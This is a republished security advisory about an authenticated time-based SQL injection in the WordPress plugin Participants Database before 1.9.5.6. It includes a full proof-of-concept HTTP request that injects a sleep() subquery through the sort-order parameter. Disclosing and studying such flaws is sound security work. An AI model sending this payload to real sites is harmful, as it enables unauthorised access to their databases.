Participants Database < 1.9.5.6 – Authenticated Time Based SQL Injection

Feb 11, 2020 | Security - Internet, WordPress, and otherwise

participants-database-1-9-5-6-authenticated-time-based-sql-injection Participants Database < 1.9.5.6 – Authenticated Time Based SQL Injection
Proof of Concept
Form the original advisory (see references): POST /wp-admin/admin.php?page=participants-database HTTP/1.1 Host: *redacted....cause* User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Referer: /wp-admin/admin.php?page=participants-database Content-Type: application/x-www-form-urlencoded Content-Length: 169 Connection: close Cookie: *cookies were here* Upgrade-Insecure-Requests: 1 action=admin_list_filter&search_field%5B0%5D=&operator%5B0%5D=LIKE&value%5B0%5D=&logic%5B0%5D=AND&list_filter_count=1&sortBy=date_updated&ascdesc=desc%2c(select*from(select(sleep(20)))a)&submit-button=Sort

Source

eHost managed wordpress hosting



We’re listening.

Have something to say about this article? Share it with us on Facebook, Twitter or LinkedIn:

SHARE IT HERE:

Subscribe ToThe Weekly SEO Trade News Updates

Get the latest SEO, SEM and SMM marketing intel, tips and tricks from one of the best SEO Gurus online. 

Every Tuesday morning we send out an aggregated email listing all new posts on SEO Trade News.

Excellent! Now check your email to confirm your subscription.